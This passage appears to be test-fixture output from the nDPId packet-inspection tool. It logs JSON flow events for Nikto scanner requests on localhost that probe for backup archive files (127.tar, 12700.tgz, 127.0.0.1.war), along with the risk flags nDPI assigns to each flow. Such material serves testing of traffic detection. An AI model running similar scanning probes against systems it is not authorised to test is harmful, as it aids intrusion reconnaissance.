(Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1576420276950,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276950,"pkt":"AAAAAAAAAAAAAAAACABFAADGIHlAAEAGG7d\/AAABfwAAAcLwH5AJERgjseiOe4AYAED+ugAAAQEICp1m+\/6dZvv+R0VUIC8xMjcwMC50YXIubHptYSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276950,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1576420276953,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276953,"pkt":"AAAAAAAAAAAAAAAACABFAADB609AAEAGUOV\/AAABfwAAAcLyH5CMSNMc4cqoooAYAED+tQAAAQEICp1m\/AGdZvwBR0VUIC8xMjcwMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276953,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1576420276955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276955,"pkt":"AAAAAAAAAAAAAAAACABFAADBW5ZAAEAG4J5\/AAABfwAAAcL0H5DrXWPDXa4XUYAYAED+tQAAAQEICp1m\/AOdZvwDR0VUIC8xMjcwMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276955,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1576420276956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276956,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/O0xAAEAGAOt\/AAABfwAAAcL2H5D9kwMeqK3jJ4AYAED+swAAAQEICp1m\/ASdZvwER0VUIC8xMjcudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276956,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1576420276957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276957,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/H8ZAAEAGHHF\/AAABfwAAAcL4H5BlEieUASYiL4AYAED+swAAAQEICp1m\/AWdZvwFR0VUIC8xMjcudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276957,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1576420276959,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276959,"pkt":"AAAAAAAAAAAAAAAACABFAADIMS5AAEAGCwB\/AAABfwAAAcL6H5D33Al8T9gIjoAYAED+vAAAAQEICp1m\/AedZvwHR0VUIC8xMjdfMF8wXzEudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276959,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1576420276960,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276960,"pkt":"AAAAAAAAAAAAAAAACABFAADI29RAAEAGYFl\/AAABfwAAAcL8H5B21OOLlrDXQ4AYAED+vAAAAQEICp1m\/AidZvwIR0VUIC8xMjdfMF8wXzEudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276960,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1576420276961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276961,"pkt":"AAAAAAAAAAAAAAAACABFAADFGIxAAEAGI6V\/AAABfwAAAcL+H5DvJyDTt9IC\/IAYAED+uQAAAQEICp1m\/AmdZvwJR0VUIC8xMjcuMC4wLjEud2FyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276961,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1576420276964,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276964,"pkt":"AAAAAAAAAAAAAAAACABFAADFxd9AAEAGdlF\/AAABfwAAAcMAH5CFNv2FdhNdEIAYAED+uQAAAQEICp1m\/AudZvwLR0VUIC8xMjcuMC4wLjEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":188,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276964,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1576420276965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276965,"pkt":"AAAAAAAAAAAAAAAACABFAAC95pxAAEAGVZx\/AAABfwAAAcMCH5C3Cd7E92VLp4AYAED+sQAAAQEICp1m\/A2dZvwNR0VUIC8xLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":189,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276965,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1576420276966,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276966,"pkt":"AAAAAAAAAAAAAAAACABFAAC9ujdAAEAGggF\/AAABfwAAAcMEH5BKt4Jt+wc3pIAYAED+sQAAAQEICp1m\/A6dZvwOR0VUIC8xLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":190,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276966,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 